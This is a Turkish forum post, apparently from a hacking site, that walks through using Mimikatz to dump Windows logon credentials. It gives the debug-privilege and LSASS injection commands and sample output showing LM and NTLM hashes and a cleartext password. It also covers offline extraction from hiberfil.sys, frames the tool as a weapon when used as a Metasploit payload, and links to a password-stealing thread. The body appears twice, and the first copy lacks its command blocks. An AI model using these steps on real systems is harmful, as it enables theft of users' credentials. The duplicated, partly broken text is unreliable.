Anarchosa&ByR0L3S4
Canlı sistemler ya da offline sistemlerden kullanıcı şifrelerini salt metin (clear text) olarak toplayabilen bu araç penetrasyon testi uzmanlarının yanı sıra, son zamanlarda adli bilişim uzmanlarının da dikkatini çekmiştir.
Mimikatz, çalışan bir sistemde yönetici yetkisi ile (administrator) çalıştırılır. Eğer sistem canlı değilse, sistem imajı içerisinde hiberfil.sys dosyası dump formatınadönüştürülerek crash dump içerisinden de ilgili bilgileri alabilir.
Mimikatz kendi dahili komutları üzerinden sistemden bilgi toplar. Örneğin mimikatz Windows komut istemcisi üzerinde çalıştırıldıktan sonra (mimikatz.exe) sırasıyla;
komutları verilerek hata ayıklama modu etkinleştirilir, LSASS.exe içerisine sekurlsa.dlldosyası enjekte edilir ve giriş bilgileri toplanır. LSASS.exe dosyası Windows’un local güvenlik politikaları, erişim yetkileri ve oturum kontrol işlemlerine erişebilir.
privilege::debug hata ayıklama komutundan sonra sekurlsa::logonpasswords komutu verilerek de aynı sonuçlar elde edilebilir.
Elde edilen bilgiler aşağıdaki gibi görünür;
Yukarıda görüldüğü gibi taylan kullanıcısına ait şifre NTLM formatında verildiği gibi clear text halinde de verilmektedir. Sistemde başka kullanıcılar da varsa onlara ait bilgiler de toplanır.
Mimikatz ayrıca Metasploit projesinde de kullanılmaktadır. Metasploit kullanılarak hazırlanacak bir exploit’e payload olarak eklenerek de oldukça güçlü bir silaha dönüştürülebilir.
Örnek Olarak Bu Makaleye bakınız --___--> https://www.spyhackerz.com/forum/threads/2-tools-İle-sistem-Şifrelerinin-Çalınması-vs.11235/
Canlı sistemler ya da offline sistemlerden kullanıcı şifrelerini salt metin (clear text) olarak toplayabilen bu araç penetrasyon testi uzmanlarının yanı sıra, son zamanlarda adli bilişim uzmanlarının da dikkatini çekmiştir.
Mimikatz, çalışan bir sistemde yönetici yetkisi ile (administrator) çalıştırılır. Eğer sistem canlı değilse, sistem imajı içerisinde hiberfil.sys dosyası dump formatınadönüştürülerek crash dump içerisinden de ilgili bilgileri alabilir.
Mimikatz kendi dahili komutları üzerinden sistemden bilgi toplar. Örneğin mimikatz Windows komut istemcisi üzerinde çalıştırıldıktan sonra (mimikatz.exe) sırasıyla;
Kod:
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswordskomutları verilerek hata ayıklama modu etkinleştirilir, LSASS.exe içerisine sekurlsa.dlldosyası enjekte edilir ve giriş bilgileri toplanır. LSASS.exe dosyası Windows’un local güvenlik politikaları, erişim yetkileri ve oturum kontrol işlemlerine erişebilir.
privilege::debug hata ayıklama komutundan sonra sekurlsa::logonpasswords komutu verilerek de aynı sonuçlar elde edilebilir.
Elde edilen bilgiler aşağıdaki gibi görünür;
Kod:
mimikatz # sekurlsa::logonPasswords
Authentication Id: 0; 141237
User Name: taylan.kahraman
Domain: WINDOWS-8
msv:
* Username: taylan
* Domain: Home
* LM: d0e9aee149655a6075e4540af1f22d3b
* NTLM: cc36cf7a8514893efccd332446158b1a
tspkg:
* Username: taylan
* Domain: Home
* Password: waza1234 /
WDigest:
* Username: taylan
* Domain: MicrosoftAccount
* Password: waza1234 /
mimikatz # sekurlsa::logonPasswords
Authentication Id: 0; 141237
User Name: taylan.kahraman
Domain: WINDOWS-8
msv:
* Username: taylan
* Domain: Home
* LM: d0e9aee149655a6075e4540af1f22d3b
* NTLM: cc36cf7a8514893efccd332446158b1a
tspkg:
* Username: taylan
* Domain: Home
* Password: waza1234 /
WDigest:
* Username: taylan
* Domain: MicrosoftAccount
* Password: waza1234 /Yukarıda görüldüğü gibi taylan kullanıcısına ait şifre NTLM formatında verildiği gibi clear text halinde de verilmektedir. Sistemde başka kullanıcılar da varsa onlara ait bilgiler de toplanır.
Mimikatz ayrıca Metasploit projesinde de kullanılmaktadır. Metasploit kullanılarak hazırlanacak bir exploit’e payload olarak eklenerek de oldukça güçlü bir silaha dönüştürülebilir.
Örnek Olarak Bu Makaleye bakınız --___--> https://www.spyhackerz.com/forum/threads/2-tools-İle-sistem-Şifrelerinin-Çalınması-vs.11235/
Moderatörün son düzenlenenleri:
